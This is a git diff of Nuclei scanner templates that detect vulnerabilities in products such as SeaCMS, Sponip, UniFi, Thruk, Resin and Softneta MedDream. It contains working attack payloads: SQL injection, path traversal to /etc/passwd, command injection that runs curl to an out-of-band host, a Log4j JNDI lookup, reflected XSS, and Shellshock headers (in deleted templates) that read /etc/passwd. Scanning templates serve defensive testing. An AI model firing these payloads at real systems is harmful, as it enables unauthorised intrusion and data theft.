/dev/null +++ b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml @@ -0,0 +1,28 @@ +id: qizhi-fortressaircraft-unauth + +info: + name: Qizhi Fortressaircraft Unauthorized Access + author: ritikchaddha + severity: high + reference: + - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw + tags: qizhi,fortressaircraft,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "错误的id" + - "审计管理员" + - "事件审计" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml deleted file mode 100644 index 03aef64b1d..0000000000 --- a/vulnerabilities/other/rce-shellshock-user-agent.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: rce-user-agent-shell-shock - -info: - name: Remote Code Execution Via (User-Agent) - author: 0xelkomy - severity: high - tags: shellshock,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/status" - - headers: - User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" - - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body \ No newline at end of file diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 0d32e296d5..a4611b31a5 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -4,11 +4,11 @@ info: name: rConfig 3.9.5 - Remote Code Execution author: dwisiswant0 severity: high - tags: rconfig,rce description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 + tags: rconfig,rce requests: - raw: diff --git a/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/vulnerabilities/other/resin-cnnvd-200705-315.yaml index 8cb1cfac33..6f6923a459 100644 --- a/vulnerabilities/other/resin-cnnvd-200705-315.yaml +++ b/vulnerabilities/other/resin-cnnvd-200705-315.yaml @@ -1,4 +1,5 @@ id: resin-cnnvd-200705-315 + info: name: Caucho Resin Information Disclosure author: princechaddha diff --git a/vulnerabilities/other/resin-inputfile-fileread.yaml b/vulnerabilities/other/resin-inputfile-fileread.yaml index ec2b937c94..37e1be70b9 100644 --- a/vulnerabilities/other/resin-inputfile-fileread.yaml +++ b/vulnerabilities/other/resin-inputfile-fileread.yaml @@ -1,11 +1,13 @@ id: resin-inputfile-fileread + info: name: Caucho Resin LFR author: princechaddha severity: high description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. + reference: + - https://blkstone.github.io/2017/10/30/resin-attack-vectors/ tags: resin,caucho,lfr - reference: https://blkstone.github.io/2017/10/30/resin-attack-vectors/ requests: - method: GET diff --git a/vulnerabilities/other/resin-viewfile-lfr.yaml b/vulnerabilities/other/resin-viewfile-lfr.yaml index 27b8d5798e..810d40509c 100644 --- a/vulnerabilities/other/resin-viewfile-lfr.yaml +++ b/vulnerabilities/other/resin-viewfile-lfr.yaml @@ -1,9 +1,11 @@ id: resin-viewfile-lfr + info: name: Caucho Resin LFR author: princechaddha severity: high - description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files. + description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, + including JSP source code or class files. reference: - http://0day5.com/archives/1173/ - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml index e4395968ad..a44e456d52 100644 --- a/vulnerabilities/other/rockmongo-xss.yaml +++ b/vulnerabilities/other/rockmongo-xss.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. - reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss requests: diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml index 2e4aa14045..43abcf1ad7 100644 --- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml +++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml @@ -1,10 +1,12 @@ id: sangfor-edr-auth-bypass + info: name: Sangfor EDR Authentication Bypass author: princechaddha severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. - tags: sangfor,auth-bypass + description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login + screen without providing a username. + tags: sangfor,auth-bypass,login requests: - method: GET diff --git a/vulnerabilities/other/sangfor-edr-rce.yaml b/vulnerabilities/other/sangfor-edr-rce.yaml index 997f107b6f..309c0580be 100644 --- a/vulnerabilities/other/sangfor-edr-rce.yaml +++ b/vulnerabilities/other/sangfor-edr-rce.yaml @@ -5,8 +5,9 @@ info: author: pikpikcu severity: critical description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands. - reference: https://www.cnblogs.com/0day-li/p/13650452.html - tags: rce + reference: + - https://www.cnblogs.com/0day-li/p/13650452.html + tags: rce,sangfor requests: - method: POST @@ -21,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml index e970788ccf..906e0b928c 100644 --- a/vulnerabilities/other/sap-redirect.yaml +++ b/vulnerabilities/other/sap-redirect.yaml @@ -7,7 +7,6 @@ info: description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap - requests: - method: GET diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 24a127592a..d8d654126f 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -4,8 +4,10 @@ info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical - description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: https://www.exploit-db.com/exploits/49344 + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could + exploit this vulnerability to execute arbitrary commands on the system. + reference: + - https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oast requests: diff --git a/vulnerabilities/other/seacms-rce.yaml b/vulnerabilities/other/seacms-rce.yaml index 7f2dbaec18..54d215da6b 100644 --- a/vulnerabilities/other/seacms-rce.yaml +++ b/vulnerabilities/other/seacms-rce.yaml @@ -1,10 +1,12 @@ id: seacms-rce + info: name: SeaCMS V6.4.5 RCE author: pikpikcu severity: high description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. - reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ + reference: + - https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce requests: diff --git a/vulnerabilities/other/seacms-sqli.yaml b/vulnerabilities/other/seacms-sqli.yaml new file mode 100644 index 0000000000..1eb29a5bc1 --- /dev/null +++ b/vulnerabilities/other/seacms-sqli.yaml @@ -0,0 +1,27 @@ +id: seacms-sqli + +info: + name: SeaCMS V8.7 SQL Injection + author: ritikchaddha + severity: high + reference: + - https://www.uedbox.com/post/54561/ + tags: seacms,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml index 306a4dfa29..527e8bffe9 100644 --- a/vulnerabilities/other/seowon-router-rce.yaml +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -5,7 +5,8 @@ info: author: gy741 severity: critical description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page - reference: https://www.exploit-db.com/exploits/50295 + reference: + - https://www.exploit-db.com/exploits/50295 tags: rce,seowon,router,unauth,iot requests: @@ -24,7 +25,7 @@ requests: - type: regex part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/servicenow-helpdesk-credential.yaml b/vulnerabilities/other/servicenow-helpdesk-credential.yaml new file mode 100644 index 0000000000..0d97219391 --- /dev/null +++ b/vulnerabilities/other/servicenow-helpdesk-credential.yaml @@ -0,0 +1,33 @@ +id: servicenow-helpdesk-credential + +info: + name: ServiceNow Helpdesk Credential Exposure + author: ok_bye_now + severity: high + description: Detection of exposed credentials in help the help desk JS file. + reference: + - https://jordanpotti.com/2021/02/21/ServiceNow-HelpTheHelpDeskAndTheHackers/ + tags: servicenow,exposure + +requests: + - method: GET + path: + - "{{RootURL}}/HelpTheHelpDesk.jsdbx" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'var httpPassword = "encrypt:' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - 'var server = "([a-z:/0-9.-]+)"' \ No newline at end of file diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index 574d070ebd..8b382f16d5 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -4,7 +4,8 @@ info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - reference: https://github.com/star7th/showdoc/pull/1059 + reference: + - https://github.com/star7th/showdoc/pull/1059 tags: rce,fileupload,showdoc requests: diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index 41f8cba47a..5f0c2f5855 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -4,12 +4,12 @@ info: name: Sick Beard XSS author: pikpikcu severity: medium - tags: xss reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link metadata: shodan-query: sickbeard + tags: xss requests: - method: GET diff --git a/vulnerabilities/other/sl-studio-lfi.yaml b/vulnerabilities/other/sl-studio-lfi.yaml new file mode 100644 index 0000000000..15e7f3d46c --- /dev/null +++ b/vulnerabilities/other/sl-studio-lfi.yaml @@ -0,0 +1,26 @@ +id: sl-studio-lfi + +info: + name: Webbdesign SL-Studio Directory Traversal + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018110187 + metadata: + google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' + tags: slstudio,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml new file mode 100644 index 0000000000..88c4402fbb --- /dev/null +++ b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -0,0 +1,27 @@ +id: sofneta-mecdream-pacs-lfi + +info: + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + author: 0x_akoko + severity: high + description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + reference: + - https://www.exploit-db.com/exploits/45347 + - https://www.softneta.com/products/meddream-pacs-server/downloads.html + metadata: + google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login + tags: sofneta,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml index 7e3f5cd21d..bc839a4439 100644 --- a/vulnerabilities/other/solar-log-authbypass.yaml +++ b/vulnerabilities/other/solar-log-authbypass.yaml @@ -4,8 +4,12 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server - reference: https://www.exploit-db.com/exploits/49986 + description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows + arbitrary remote attackers gain administrative privileges by connecting to the server. + reference: + - https://www.exploit-db.com/exploits/49986 + classification: + cwe-id: CWE-284 tags: solarlog,auth-bypass requests: @@ -30,3 +34,5 @@ requests: - " Solare Datensysteme GmbH" - "mailto:info@solar-log.com" condition: and + +# Enhanced by mp on 2022/04/12 diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index e2fc51ac29..d82664d278 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -22,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: diff --git a/vulnerabilities/other/spark-webui-unauth.yaml b/vulnerabilities/other/spark-webui-unauth.yaml index fdc11f53c8..6ca1120cb0 100644 --- a/vulnerabilities/other/spark-webui-unauth.yaml +++ b/vulnerabilities/other/spark-webui-unauth.yaml @@ -1,9 +1,11 @@ id: spark-webui-unauth + info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc tags: spark,unauth requests: diff --git a/vulnerabilities/other/sponip-network-system-ping-rce.yaml b/vulnerabilities/other/sponip-network-system-ping-rce.yaml new file mode 100644 index 0000000000..98ed9e10b1 --- /dev/null +++ b/vulnerabilities/other/sponip-network-system-ping-rce.yaml @@ -0,0 +1,25 @@ +id: sponip-network-system-ping-rce + +info: + name: Sponip Network System Ping RCE + author: pikpikcu + severity: critical + reference: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 + tags: sponip,rce,oast,network + +requests: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1 + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" diff --git a/vulnerabilities/other/symantec-messaging-gateway.yaml b/vulnerabilities/other/symantec-messaging-gateway.yaml index 4bab74cd1c..ab5c216ab1 100644 --- a/vulnerabilities/other/symantec-messaging-gateway.yaml +++ b/vulnerabilities/other/symantec-messaging-gateway.yaml @@ -5,7 +5,7 @@ info: author: Random_Robbie severity: medium description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - tags: lfi + tags: lfi,messaging,symantec requests: - method: GET diff --git a/vulnerabilities/other/tamronos-rce.yaml b/vulnerabilities/other/tamronos-rce.yaml index 03c27beac8..581c85bc75 100644 --- a/vulnerabilities/other/tamronos-rce.yaml +++ b/vulnerabilities/other/tamronos-rce.yaml @@ -1,10 +1,21 @@ id: tamronos-rce info: - name: TamronOS IPTV/VOD RCE + name: TamronOS IPTV/VOD - Remote Command Execution author: pikpikcu severity: critical - reference: https://twitter.com/sec715/status/1405336456923471874 + description: | + TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint. + reference: + - https://twitter.com/sec715/status/1405336456923471874 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-78 + metadata: + verified: true + shodan-query: title:"TamronOS IPTV系统" + fofa-query: title="TamronOS IPTV系统" tags: tamronos,rce requests: @@ -17,8 +28,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by cs on 2022/05/13 diff --git a/vulnerabilities/other/tekon-info-leak.yaml b/vulnerabilities/other/tekon-info-leak.yaml new file mode 100644 index 0000000000..f75dbc2382 --- /dev/null +++ b/vulnerabilities/other/tekon-info-leak.yaml @@ -0,0 +1,36 @@ +id: tekon-info-leak + +info: + name: Tekon - Unauthenticated Log Leak + author: gy741 + severity: low + description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device + reference: + - https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38 + metadata: + shodan-query: title:"контроллер" + tags: tekon,exposure,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/log.cgi' + + max-size: 2048 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "-- Logs begin at" + - "end at" + condition: and + + - type: word + part: header + words: + - "text/plain" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml index 05a87a54d0..90dc713ceb 100644 --- a/vulnerabilities/other/thinkific-redirect.yaml +++ b/vulnerabilities/other/thinkific-redirect.yaml @@ -6,7 +6,6 @@ info: severity: medium tags: redirect - requests: - method: GET diff --git a/vulnerabilities/other/thruk-xss.yaml b/vulnerabilities/other/thruk-xss.yaml new file mode 100644 index 0000000000..5a5051619b --- /dev/null +++ b/vulnerabilities/other/thruk-xss.yaml @@ -0,0 +1,35 @@ +id: thruk-xss + +info: + name: Thruk Monitoring Webinterface - XSS + author: pikpikcu + severity: medium + reference: + - https://www.thruk.org/download.html + tags: xss,thruk + +requests: + - raw: + - | + POST /thruk/cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/thruk/cgi-bin/login.cgi?thruk + + referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" diff --git a/vulnerabilities/other/tianqing-info-leak.yaml b/vulnerabilities/other/tianqing-info-leak.yaml new file mode 100644 index 0000000000..127dc0bce8 --- /dev/null +++ b/vulnerabilities/other/tianqing-info-leak.yaml @@ -0,0 +1,33 @@ +id: tianqing-info-leak + +info: + name: Tianqing Info Leak + author: ritikchaddha + severity: medium + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + tags: tianqing,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/dbstat/gettablessize" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "schema_name" + - "table_name" + - "table_size" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/tikiwiki-json-rpc.yaml b/vulnerabilities/other/tikiwiki-json-rpc.yaml new file mode 100644 index 0000000000..8d026c20d8 --- /dev/null +++ b/vulnerabilities/other/tikiwiki-json-rpc.yaml @@ -0,0 +1,44 @@ +id: kiwitcms-json-rpc + +info: + name: Kiwi TCMS Information Disclosure + author: act1on3 + severity: high + reference: + - https://hackerone.com/reports/968402 + - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/ + - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml + metadata: + shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 + tags: kiwitcms,exposure,misconfig + +requests: + - raw: + - | + POST /json-rpc/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + + {"jsonrpc":"2.0","method":"User.filter","id": 1,"params":{"query":{"is_active":true}}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - result + - username + - jsonrpc + - is_active + condition: and + + extractors: + - type: json + part: body + json: + - .result[].username \ No newline at end of file diff --git a/vulnerabilities/other/tongda-session-disclosure.yaml b/vulnerabilities/other/tongda-session-disclosure.yaml new file mode 100644 index 0000000000..dc5a99f94f --- /dev/null +++ b/vulnerabilities/other/tongda-session-disclosure.yaml @@ -0,0 +1,33 @@ +id: tongda-session-disclosure + +info: + name: Tongda User Session Disclosure + author: ritikchaddha + severity: medium + reference: + - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ + tags: tongda,disclosure + +requests: + - method: POST + path: + - "{{BaseURL}}/general/userinfo.php?UID=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"dept_name":"' + - '"online_flag":' + condition: and + + - type: word + part: header + words: + - "application/json" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/tpshop-directory-traversal.yaml b/vulnerabilities/other/tpshop-directory-traversal.yaml index 47af9e5038..e88bb55f43 100644 --- a/vulnerabilities/other/tpshop-directory-traversal.yaml +++ b/vulnerabilities/other/tpshop-directory-traversal.yaml @@ -4,7 +4,8 @@ info: name: TPshop Directory Traversal author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA + reference: + - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA tags: tpshop,lfi requests: diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml index a44e962186..2f99cb2f82 100644 --- a/vulnerabilities/other/turbocrm-xss.yaml +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. - reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + reference: + - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a tags: xss,turbocrm requests: diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index 733c46e297..7707e6a4e8 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -1,4 +1,5 @@ id: ueditor-file-upload + info: name: UEditor Arbitrary File Upload author: princechaddha diff --git a/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/vulnerabilities/other/unauth-hoteldruid-panel.yaml index 921549ed63..128e2e78c0 100644 --- a/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -1,10 +1,17 @@ id: unauth-hoteldruid-panel + info: - name: Unauthenticated Hoteldruid Panel + name: Hoteldruid Management Panel Access author: princechaddha severity: high description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. - reference: https://www.hoteldruid.com/ + reference: + - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42949.json + - https://www.hoteldruid.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: hoteldruid,panel,unauth requests: @@ -26,3 +33,5 @@ requests: - "INSERT:" - "TABLES:" condition: and + +# Enhanced by mp on 2022/03/24 diff --git a/vulnerabilities/other/unauth-rlm.yaml b/vulnerabilities/other/unauth-rlm.yaml new file mode 100644 index 0000000000..057a35f077 --- /dev/null +++ b/vulnerabilities/other/unauth-rlm.yaml @@ -0,0 +1,23 @@ +id: unauth-rlm + +info: + name: Unauthenticated Reprise License Manager + author: Akincibor + severity: critical + tags: unauth,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/menu" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Administration Commands" \ No newline at end of file diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml index 56ccbcbe76..504318c39a 100644 --- a/vulnerabilities/other/unauth-spark-api.yaml +++ b/vulnerabilities/other/unauth-spark-api.yaml @@ -1,10 +1,17 @@ id: unauth-spark-api + info: name: Unauthenticated Spark REST API author: princechaddha severity: medium - description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. - reference: https://xz.aliyun.com/t/2490 + description: The Spark product's REST API interface allows access to unauthenticated users. + reference: + - https://xz.aliyun.com/t/2490 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + remediation: Restrict access the exposed API ports. tags: spark,unauth requests: @@ -22,3 +29,5 @@ requests: - "serverSparkVersion" part: body condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/vulnerabilities/other/unifi-network-log4j-rce.yaml b/vulnerabilities/other/unifi-network-log4j-rce.yaml new file mode 100644 index 0000000000..8d823b5ac7 --- /dev/null +++ b/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -0,0 +1,43 @@ +id: unifi-network-log4j-rce + +info: + name: UniFi Network Log4j JNDI RCE + author: KrE80r + severity: critical + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application . + reference: + - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e + - https://twitter.com/sprocket_ed/status/1473301038832701441 + metadata: + shodan-query: http.title:"UniFi Network" + tags: rce,log4j,ubnt,unifi,oast,jndi + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=utf-8 + Origin: {{RootURL}} + Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage + + {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" # Confirms the DNS Interaction + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/vulnerabilities/other/vanguard-post-xss.yaml b/vulnerabilities/other/vanguard-post-xss.yaml index c788fa2b9f..aec8293448 100644 --- a/vulnerabilities/other/vanguard-post-xss.yaml +++ b/vulnerabilities/other/vanguard-post-xss.yaml @@ -5,7 +5,8 @@ info: author: ImNightmaree severity: medium description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box - reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html tags: vanguard,xss requests: diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml index 199d945cd7..c17f20c71a 100644 --- a/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -5,7 +5,8 @@ info: author: geeknik severity: low description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. - reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system + reference: + - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc requests: diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml deleted file mode 100644 index 8b0edcd260..0000000000 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: visual-tools-dvr-rce - -info: - name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) - author: gy741 - severity: critical - description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://www.exploit-db.com/exploits/50098 - tags: visualtools,rce,oast - -requests: - - raw: - - | - GET /cgi-bin/slogin/login.py HTTP/1.1 - Host: {{Hostname}} - Accept: */* - User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - 